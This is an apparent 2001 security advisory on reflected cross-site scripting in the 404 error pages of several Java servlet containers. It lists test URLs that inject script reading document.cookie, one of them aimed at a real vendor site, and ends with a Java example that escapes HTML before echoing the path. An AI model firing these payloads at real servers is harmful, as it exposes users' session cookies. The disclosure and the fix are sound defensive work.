Multiple Java Servlet platforms contain a cross-site scripting vulnerability

Published: 2001-07-03
Updated: 2001-07-03
Severity: Medium
Threat: Server information disclosure
Error type: Design error
Exploitation mode: Server mode

Affected systems

Tomcat 3.2.1, 3.2.2-beta, 4.0-beta

Detailed description

By requesting URLs such as the following, the script code is executed in the browser:

Tomcat 3.2.1:
http://Tomcat/jsp-mapped-dir/>alert(document.cookie)</SCRIPT>.jsp

JRun 3.0:
http://JRun/>alert(document.cookie)</SCRIPT>.shtml
http://JRun/>alert(document.cookie)</SCRIPT>.jsp
http://JRun/>alert(document.cookie)</SCRIPT>.thtml

WebSphere 3.5 FP2:
http://WebSphere/webapp/examples/>alert(document.cookie)</SCRIPT>

WebSphere 3.02:
http://WebSphere/>alert(document.cookie)</SCRIPT>.jsp

VisualAge for Java 3.5 Professional:
http://VisualAge-WebSphere-Test-Environment/>alert(document.cookie)</SCRIPT>

Resin 1.2.2:
http://Reisin/>alert(document.cookie)</SCRIPT>.jsp
http://www.caucho.com/>document.write(document.cookie)</SCRIPT>.jsp

These pages produce output like this:

=================================================
Error 404
An error has occurred while processing request: http://WebSphere/webapp/examples/******
Message: File not found: //******
StackTrace:
com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //******
at javax.servlet.ServletException.<init>(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
...
=================================================

******: The JavaScript code is executed here.

Test code

See the description section.

Solution

None yet.

Related information
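The root cause shown in the output above is that the container copies the requested path into the 404 page (request line, message and stack trace alike) without HTML-encoding it. The following is an added example, not code from the advisory or from any of the listed vendors, of an error-page renderer that encodes the URI before echoing it; the class name, method names and the constructed sample path are assumptions.

```java
// Added example (not from the advisory or any vendor): a 404 renderer that
// HTML-escapes everything derived from the request before it reaches the page.
public final class SafeNotFoundPage {

    /** Escape the characters that let text break out of HTML text context. */
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /**
     * Build the error body. In a Servlet 2.3 container this would run in the
     * <error-page> target, taking the URI from the request attribute
     * "javax.servlet.error.request_uri"; it is a plain method here so the
     * example runs stand-alone. Note that the exception message in the
     * advisory's output also carries the path, so it must be escaped too.
     */
    static String renderNotFound(String requestUri, String exceptionMessage) {
        String safeUri = escapeHtml(requestUri);
        String safeMsg = escapeHtml(exceptionMessage);
        return "<html><body><h1>Error 404</h1>"
             + "<p>An error has occurred while processing request: " + safeUri + "</p>"
             + "<p>Message: " + safeMsg + "</p>"
             + "</body></html>";
    }

    public static void main(String[] args) {
        // Constructed request path shaped like the advisory's test URLs.
        String probe = "/webapp/examples/>alert(document.cookie)</SCRIPT>";
        String page = renderNotFound(probe, "File not found: /" + probe);
        System.out.println(page);
        // The closing tag is now "&lt;/SCRIPT&gt;", rendered as text, not markup.
        System.out.println("raw </SCRIPT> present: " + page.contains("</SCRIPT>"));
    }
}
```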